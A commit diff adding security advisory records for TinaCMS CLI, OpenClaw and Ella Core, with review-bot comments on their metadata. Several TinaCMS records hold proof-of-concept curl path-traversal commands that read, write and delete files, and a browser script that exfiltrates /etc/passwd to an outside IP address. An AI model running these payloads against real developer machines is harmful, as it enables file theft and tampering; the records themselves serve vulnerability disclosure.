
Commit 2e1655f

1 parent bb86ec5 commit 2e1655f

7 files changed

Lines changed: 386 additions & 2 deletions


Lines changed: 61 additions & 0 deletions
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-2f24-mg4x-534q",
4+
"modified": "2026-03-12T20:32:26Z",
5+
"published": "2026-03-12T20:32:26Z",
6+
"aliases": [
7+
"CVE-2026-28793"
8+
],
9+
"summary": "TinaCMS Vulnerable to Path Traversal Leading to Arbitrary File Read, Write and Delete",
10+
"details": "## Summary\nThe TinaCMS CLI development server exposes media endpoints that are vulnerable to path traversal, allowing attackers to read and write arbitrary files on the filesystem outside the intended media directory.\n\n## Details\nWhen running tinacms dev, the CLI starts a local HTTP server (default port 4001) exposing endpoints such as:\n\n- /media/list/*\n\n- /media/upload/*\n\n- /media/*\n\nThese endpoints process user-controlled path segments using decodeURI() and path.join() without validating that the resolved path remains within the configured media directory.\n\n### Vulnerable code\n```\nbb.on('file', async (_name, file, _info) => {\n const fullPath = decodeURI(req.url?.slice('/media/upload/'.length));\n const saveTo = path.join(mediaFolder, ...fullPath.split('/'));\n// No validation that saveTo remains within mediaFolder\n await fs.ensureDir(path.dirname(saveTo));\n file.pipe(fs.createWriteStream(saveTo));\n });\n```\n## PoC\n**Arbitrary File Read**\n```\ncurl \"http://localhost:4001/media/list/../../../etc/passwd\"\n```\n\nResult:\n\n<img width=\"889\" height=\"280\" alt=\"image(1)\" src=\"https://github.com/user-attachments/assets/a878a86a-71db-46ed-abda-3d4ddba692e0\" />\n\n\n**Arbitrary File Write**\n```\necho \"ATTACKER_CONTROLLED_CONTENT\" > /tmp/payload.txt\n\ncurl --path-as-is -X POST \\\n \"http://localhost:4001/media/upload/../../../../../../tmp/pwned.txt\" \\\n -F \"file=@/tmp/payload.txt\"\ncat /tmp/pwned.txt\n```\nResult:\n<img width=\"1320\" height=\"84\" alt=\"image(8)\" src=\"https://github.com/user-attachments/assets/8bd5046b-0456-474f-ab96-4e18a421997c\" />\n\n**Arbitrary File Delete**\n```\necho \"delete_me\" > /tmp/delete-test.txt\ncat /tmp/delete-test.txt # confirms file exists\ncurl --path-as-is -X DELETE \\\n\"http://localhost:4001/media/../../../../../../tmp/delete-test.txt\"\ncat /tmp/delete-test.txt # \"No such file or directory\"\n```\n<img width=\"1135\" height=\"105\" alt=\"image\" 
src=\"https://github.com/user-attachments/assets/64c24b83-0259-4a12-969d-98c8e8cc81ca\" />\n\n## Impact\n\nAn attacker who can reach the TinaCMS CLI dev server can:\n\n- Read arbitrary files (e.g. /etc/passwd, .env, SSH keys)\n\n- Write arbitrary files anywhere writable by the server process\n\n- Delete or overwrite files, depending on endpoint usage\n\n- Escalate to code execution in realistic development setups by overwriting executable scripts, configuration files, or watched source files\n\n## Attack Surface\n\nThe dev server binds to localhost by default, but exploitation is realistic in:\n\n- Cloud IDEs (Codespaces, Gitpod)\n\n- Docker or VM setups with port forwarding\n\n- Misconfigured dev environments binding to 0.0.0.0\n\n- Local malware or malicious dependencies\n\nThe server also enables permissive CORS, which may allow browser-based exploitation if the dev server is externally reachable, but CORS is not required for exploitation.\n\n## Recommended Fix\n\n- Resolve paths to absolute form\n\n- Enforce that resolved paths remain within the media root\n\n- Reject .. path segments and absolute paths\n\n- Consider authentication or token protection for dev server endpoints",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@tinacms/cli"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.1.8"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28793"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/tinacms/tinacms"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-22"
55+
],
56+
"severity": "HIGH",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-03-12T20:32:26Z",
59+
"nvd_published_at": "2026-03-12T17:16:50Z"
60+
}
61+
}
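Review bot: the `severity` vector on line 14 (`AV:L`) does not match the reach that the `details` string describes under `## Attack Surface`, where the dev server is said to be exploitable through cloud IDE port forwarding, Docker/VM port forwarding and `0.0.0.0` binds; either the vector should be justified against the localhost-only default or the Attack Surface text should be scoped to it. The `references` array also carries only the advisory, NVD and package entries with no fix commit or pull request for the fixed version `2.1.8`, while the sibling record for the same package (GHSA-8pw3-9m7f-q734) links pull request 6450 and the fix commit; adding the same entries here would let consumers locate the patch.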
Lines changed: 65 additions & 0 deletions
@@ -0,0 +1,65 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-5wcw-8jjv-m286",
4+
"modified": "2026-03-12T20:32:59Z",
5+
"published": "2026-03-12T20:32:59Z",
6+
"aliases": [
7+
"CVE-2026-32302"
8+
],
9+
"summary": "OpenClaw: Untrusted web origins can obtain authenticated operator.admin access in trusted-proxy mode",
10+
"details": "## Summary\nIn affected versions of `openclaw`, browser-originated WebSocket connections could bypass origin validation when `gateway.auth.mode` was set to `trusted-proxy` and the request arrived with proxy headers. A page served from an untrusted origin could connect through a trusted reverse proxy, inherit proxy-authenticated identity, and establish a privileged operator session.\n\n## Impact\nThis issue affects deployments that expose the Gateway behind a trusted reverse proxy and rely on browser origin checks such as `controlUi.allowedOrigins` to restrict browser access. An attacker who can cause a victim browser to load a malicious page that can reach the proxy endpoint could establish a cross-site WebSocket connection and call privileged Gateway methods.\n\nIn verified impact, the attacker-origin page was able to request `operator.admin` and successfully call `config.get`, exposing sensitive configuration. Depending on the deployment, the same authenticated operator path could also permit other privileged reads or mutations available to operator-class callers.\n\n## Affected Packages and Versions\n- Package: `openclaw` (npm)\n- Affected versions: `< 2026.3.11`\n- Fixed in: `2026.3.11`\n\n## Technical Details\nThe WebSocket handshake logic treated proxy-delivered requests as exempt from the generic browser origin check whenever an `Origin` header was present alongside proxy headers. In `trusted-proxy` mode, that exemption allowed browser-originated connections to skip the normal origin-validation path even though they were still browser requests.\n\nBecause trusted-proxy authentication can produce a shared authenticated operator context, the affected path could retain requested operator scopes after the handshake. 
That made the browser origin check the missing boundary between an untrusted origin and an authenticated operator-class session.\n\n## Fix\nOpenClaw now enforces browser origin validation for any browser-originated WebSocket connection regardless of whether proxy headers are present. The fix shipped in `openclaw@2026.3.11`.\n\nFixed commit: `ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b`\nRelease tag: `v2026.3.11`\n\n## Workarounds\nUpgrade to `2026.3.11` or later.\n\nIf you cannot upgrade immediately, avoid exposing browser-reachable Gateway WebSocket endpoints in `trusted-proxy` mode to untrusted origins, and ensure reverse-proxy/browser reachability is restricted to trusted origins only.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "openclaw"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2026.3.11"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-5wcw-8jjv-m286"
42+
},
43+
{
44+
"type": "WEB",
45+
"url": "https://github.com/openclaw/openclaw/commit/ebed3bbde1a72a1aaa9b87b63b91e7c04a50036b"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/openclaw/openclaw"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.11"
54+
}
55+
],
56+
"database_specific": {
57+
"cwe_ids": [
58+
"CWE-346"
59+
],
60+
"severity": "HIGH",
61+
"github_reviewed": true,
62+
"github_reviewed_at": "2026-03-12T20:32:59Z",
63+
"nvd_published_at": null
64+
}
65+
}
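Review bot: the `## Workarounds` section in `details` opens with "Upgrade to `2026.3.11` or later", which restates the fix already given under `## Fix` rather than a workaround; leading with the mitigation sentence that follows it (restrict browser-reachable Gateway WebSocket endpoints in `trusted-proxy` mode to trusted origins) would keep the section meaningful to tooling that extracts workarounds separately from fixes. The `references` array is otherwise complete (advisory, fix commit, package, release tag), and `nvd_published_at: null` is consistent with the absence of an NVD entry for CVE-2026-32302.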

advisories/github-reviewed/2026/03/GHSA-73j8-2gch-69rq/GHSA-73j8-2gch-69rq.json

Lines changed: 2 additions & 2 deletions
Large diffs are not rendered by default.
Lines changed: 74 additions & 0 deletions
@@ -0,0 +1,74 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8pw3-9m7f-q734",
4+
"modified": "2026-03-12T20:32:09Z",
5+
"published": "2026-03-12T20:32:09Z",
6+
"aliases": [
7+
"CVE-2026-28792"
8+
],
9+
"summary": "TinaCMS CLI Dev Server Vulnerable to Cross-Origin File Exfiltration via CORS Misconfiguration + Path Traversal in TinaCMS",
10+
"details": "## Summary\nThe TinaCMS CLI dev server combines a permissive CORS configuration (Access-Control-Allow-Origin: *) with the path traversal vulnerability (previously reported) to enable a browser-based drive-by attack. A remote attacker can enumerate the filesystem, write arbitrary files, and delete arbitrary files on developer's machines by simply tricking them into visiting a malicious website while tinacms dev is running.\n\n## Details\nThe TinaCMS dev server sets permissive CORS headers that allow **any origin** to make cross-origin requests:\n\n- packages/@tinacms/cli/src/server/server.ts:\n```\n app.use(cors());\n```\n\n- packages/@tinacms/cli/src/next/vite/plugins.ts:\n```\n server.middlewares.use(cors());\n```\nWhen combined with the path traversal vulnerability, this creates a complete attack chain.\n## Attack Scenario\n\n### Prerequisites\n1. Developer runs `tinacms dev` (default port 4001) \n2. Developer visits attacker's website while TinaCMS is running\n\n**No other conditions required** - the dev server doesn't need to be:\n- Exposed to the internet\n- Bound to 0.0.0.0\n- Accessible outside localhost\n\n### Attack Flow\n1. Developer starts TinaCMS: `tinacms dev`\n2. Developer browses the web (checking email, social media, etc.)\n3. Developer unknowingly visits attacker-controlled page (malicious ad, compromised site, etc.)\n4. Attacker's JavaScript exploits CORS + path traversal to read sensitive files\n5. 
Files are exfiltrated to attacker's server\n\n## PoC\n### Attacker's Malicious Website (evil.html):\n```\n<script>\nfetch('http://localhost:4001/../../../etc/passwd')\n .then(r => r.text())\n .then(data => {\n // Exfil via GET\n const img = new Image();\n img.src = 'http://192.168.11.117:8080/exfil?data=' + encodeURIComponent(data);\n });\n</script>\n```\n### Demonstration\n\n**Step 1:** Start TinaCMS dev server\n```bash\ntinacms dev\n# Server running on http://localhost:4001\n```\n\n**Step 2:** Host evil.html on attacker server\n```bash\npython3 -m http.server 8000\n```\n\n**Step 3:** Developer visits `http://attacker-server:8000/evil.html`\n\n**Result:** The browser makes cross-origin requests to localhost:4001.\nBecause cors() returns Access-Control-Allow-Origin: *, the browser\nallows the JavaScript to read the responses. Directory listings from\noutside the media directory are sent to the attacker's server.\n<img width=\"1900\" height=\"366\" alt=\"image\" src=\"https://github.com/user-attachments/assets/72fdd31d-dd93-4728-9a4b-4d7d66d33617\" />\n\n\n## Impact\n### Who is affected\nEvery developer running `tinacms dev` is vulnerable while the dev server is active. No special configuration is required the default setup is exploitable.\n\n### What an attacker achieves\nBy hosting a malicious webpage (or injecting script via a compromised ad network, XSS on a forum, etc.), the attacker can silently:\n\n1. **Enumerate the developer's filesystem** directory listings via `/media/list/` with path traversal reveal file and folder names\n across the entire filesystem\n2. **Discover sensitive files** locate `.env`, `.git/config`, SSH keys, cloud credentials, database configs\n3. **Write arbitrary files** via `/media/upload/` with path traversal, the attacker can overwrite project source files, inject backdoors, or modify build scripts\n4. **Delete arbitrary files** via `/media/` DELETE with path traversal",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@tinacms/cli"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.1.8"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-8pw3-9m7f-q734"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-28792"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/tinacms/tinacms/pull/6450"
50+
},
51+
{
52+
"type": "WEB",
53+
"url": "https://github.com/tinacms/tinacms/commit/56d533e610a520ba66b3e58f3a0dc03487d5d5d7"
54+
},
55+
{
56+
"type": "PACKAGE",
57+
"url": "https://github.com/tinacms/tinacms"
58+
},
59+
{
60+
"type": "WEB",
61+
"url": "https://github.com/tinacms/tinacms/releases/tag/%40tinacms%2Fcli%402.1.8"
62+
}
63+
],
64+
"database_specific": {
65+
"cwe_ids": [
66+
"CWE-22",
67+
"CWE-942"
68+
],
69+
"severity": "CRITICAL",
70+
"github_reviewed": true,
71+
"github_reviewed_at": "2026-03-12T20:32:09Z",
72+
"nvd_published_at": "2026-03-12T17:16:50Z"
73+
}
74+
}
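Review bot: the `details` string refers to "the path traversal vulnerability (previously reported)" without naming it, and the `references` array has no entry for that advisory; adding `https://github.com/tinacms/tinacms/security/advisories/GHSA-2f24-mg4x-534q` (same package, same fixed version `2.1.8`) would make the attack chain this record describes traceable. Two smaller points in the same string: the PoC embeds a concrete exfiltration host, `192.168.11.117:8080`, which should be a placeholder in a database record, and the `### What an attacker achieves` list reads as run-on text where each bold item joins its explanation (e.g. "**Enumerate the developer's filesystem** directory listings via ..."), as does "No special configuration is required the default setup is exploitable". The `summary` also repeats the product name ("... Path Traversal in TinaCMS").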
Lines changed: 61 additions & 0 deletions
@@ -0,0 +1,61 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-j478-p7vq-3347",
4+
"modified": "2026-03-12T20:33:28Z",
5+
"published": "2026-03-12T20:33:28Z",
6+
"aliases": [
7+
"CVE-2026-32320"
8+
],
9+
"summary": "Ella Core: AMF DoS via malformed PathSwitchRequest with empty NR security capability bitstrings",
10+
"details": "## Summary\n\nElla Core panics when processing a PathSwitchRequest containing UE Security Capabilities with zero-length NR encryption or integrity protection algorithm bitstrings, resulting in a denial of service.\n\n## Impact\n\nAn attacker able to send crafted NGAP messages to Ella Core can crash the process, causing service disruption for all connected subscribers. No authentication is required.\n\n## Fix\n\nAdded length validation on NR algorithm bitstrings before accessing them in the PathSwitchRequest handler.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Go",
21+
"name": "github.com/ellanetworks/core"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.5.1"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/ellanetworks/core/security/advisories/GHSA-j478-p7vq-3347"
42+
},
43+
{
44+
"type": "PACKAGE",
45+
"url": "https://github.com/ellanetworks/core"
46+
},
47+
{
48+
"type": "WEB",
49+
"url": "https://github.com/ellanetworks/core/releases/tag/v1.5.1"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-125"
55+
],
56+
"severity": "MODERATE",
57+
"github_reviewed": true,
58+
"github_reviewed_at": "2026-03-12T20:33:28Z",
59+
"nvd_published_at": null
60+
}
61+
}
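Review bot: the `severity` vector on line 14 carries `PR:L`, but the `## Impact` paragraph in `details` states "No authentication is required"; one of the two should change, since `PR:L` asserts that sending the crafted NGAP PathSwitchRequest needs low privileges. The `## Fix` text says length validation was added to the PathSwitchRequest handler, yet `references` lists only the advisory, the package and the `v1.5.1` release tag with no fix commit; a commit link would let reviewers confirm the check matches the description.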
Lines changed: 62 additions & 0 deletions
@@ -0,0 +1,62 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-m48g-4wr2-j2h6",
4+
"modified": "2026-03-12T20:32:43Z",
5+
"published": "2026-03-12T20:32:43Z",
6+
"aliases": [
7+
"CVE-2026-29066"
8+
],
9+
"summary": "TinaCMS CLI has Arbitrary File Read via Disabled Vite Filesystem Restriction",
10+
"details": "## Summary\nThe TinaCMS CLI dev server configures Vite with `server.fs.strict: false`, which disables Vite's built-in filesystem access restriction. This allows any unauthenticated attacker who can reach the dev server to read arbitrary files on the host system\n\n## Details\nWhen running `tinacms dev`, the CLI starts a Vite dev server configured in:\n`packages/@tinacms/cli/src/next/vite/index.ts`\n```\nserver: {\n host: configManager.config?.build?.host ?? false,\n ...\n fs: {\n strict: false, // Disables Vite's filesystem access restriction\n },\n},\n```\nTinaCMS middleware only intercepts specific route prefixes (/media/*, /graphql, /altair, /searchIndex). Any request to a path outside these routes falls through to Vite's default static file handler, which will serve the file directly from the absolute path on the filesystem.\nAdditionally, the server enables permissive CORS (cors() with no origin restriction), which may further facilitate browser-based exploitation such as DNS rebinding attacks.\n\n## PoC\n\n**Prerequisites**: TinaCMS CLI dev server running (default port 4001).\n\n- Read system files directly:\n```\ncurl http://localhost:4001/etc/passwd\n```\n<img width=\"705\" height=\"332\" alt=\"image\" src=\"https://github.com/user-attachments/assets/6fd0e1c7-a549-40c8-bc81-af9c343f52a0\" />\n\n```\ncurl http://localhost:4001/etc/hostname\n```\n<img width=\"631\" height=\"41\" alt=\"image\" src=\"https://github.com/user-attachments/assets/bd103dc3-d4c3-4774-8007-b55de3fc2a9e\" />\nVite resolves and serves the absolute path directly from the filesystem.\n\n\n## Impact\nAny developer running tinacms dev in an environment where the dev server port is reachable by an attacker. 
This includes:\n\n- Cloud IDEs (GitHub Codespaces, Gitpod) where ports are automatically forwarded and publicly accessible\n\n- Docker or VM setups with port forwarding configured\n\n- Misconfigured environments binding to 0.0.0.0 via the build.host config option\n\n- Systems targeted via DNS rebinding attacks, leveraging the unrestricted CORS policy\n\n- Local environments with malicious dependencies running on the same machine\n\nAn attacker who can reach port 4001 can:\n\n- Read any file readable by the server process (/etc/passwd, /etc/shadow, SSH private keys)\n\n- Exfiltrate environment variables and secrets via /proc/self/environ\n\n- Access cloud credentials and API keys from configuration files",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "npm",
21+
"name": "@tinacms/cli"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "2.1.8"
32+
}
33+
]
34+
}
35+
]
36+
}
37+
],
38+
"references": [
39+
{
40+
"type": "WEB",
41+
"url": "https://github.com/tinacms/tinacms/security/advisories/GHSA-m48g-4wr2-j2h6"
42+
},
43+
{
44+
"type": "ADVISORY",
45+
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-29066"
46+
},
47+
{
48+
"type": "PACKAGE",
49+
"url": "https://github.com/tinacms/tinacms"
50+
}
51+
],
52+
"database_specific": {
53+
"cwe_ids": [
54+
"CWE-200",
55+
"CWE-552"
56+
],
57+
"severity": "MODERATE",
58+
"github_reviewed": true,
59+
"github_reviewed_at": "2026-03-12T20:32:43Z",
60+
"nvd_published_at": "2026-03-12T17:16:50Z"
61+
}
62+
}
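Review bot: the `## Impact` list in `details` names `/etc/shadow` as a readable file, but the same bullet scopes reads to files "readable by the server process", and `/etc/shadow` is readable only when that process runs as root; the example should be dropped or qualified. The `severity` vector on line 14 is `AV:L` while the Impact section lists cloud IDE port forwarding, `0.0.0.0` binds and DNS rebinding as reachability paths, the same tension as in the path-traversal record for this package. The `references` array has no fix commit or pull request for `2.1.8` (the sibling record GHSA-8pw3-9m7f-q734 links pull request 6450), and the `## Summary` paragraph is missing its closing period after "read arbitrary files on the host system".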
